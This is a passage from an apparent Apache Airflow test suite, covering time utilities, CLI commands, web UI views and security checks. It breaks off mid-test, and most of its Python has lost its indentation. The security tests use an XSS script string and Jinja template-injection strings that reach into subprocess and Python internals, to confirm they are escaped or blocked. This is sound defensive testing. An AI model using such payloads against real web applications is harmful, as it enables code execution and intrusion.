rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
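        # (round_time(dt, delta, start_date) snaps dt to the nearest whole
        # multiple of delta counted forward from start_date, which is why a dt
        # before start_date, as in rt6, rounds up to start_date itself.)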
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# Check that the recorded failure duration covers the 3 second execution timeout
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', 'conn_type', 'conn_host', 'conn_login', 'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
import subprocess
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
import subprocess
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import subprocess
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten the timeout so that this test doesn't take too long
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
# an exception is expected here since the dag doesn't exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
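# bleach.clean() HTML-escapes the <script> payload, so this assertion checks that
# the log view renders the injected string escaped rather than as executable markup.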
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_bash2 = self.dagbag.dags['test_example_bash_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_bash2 = self.dag_bash2.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last run: a link to the specific
# run and the text of its date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_bash2.dag_id,
"execution_date": self.dagrun_bash2.execution_date,
}).replace("&", "&amp;")
self.assertIn(url, resp_html)
self.assertIn(self.dagrun_bash2.execution_date.strftime("%Y-%m-%d %H:%M"), resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=test_example_bash_operator')
self.assertIn("test_example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=run_this_last&"
"dag_id=test_example_bash_operator&upstream=false&downstream=false&"
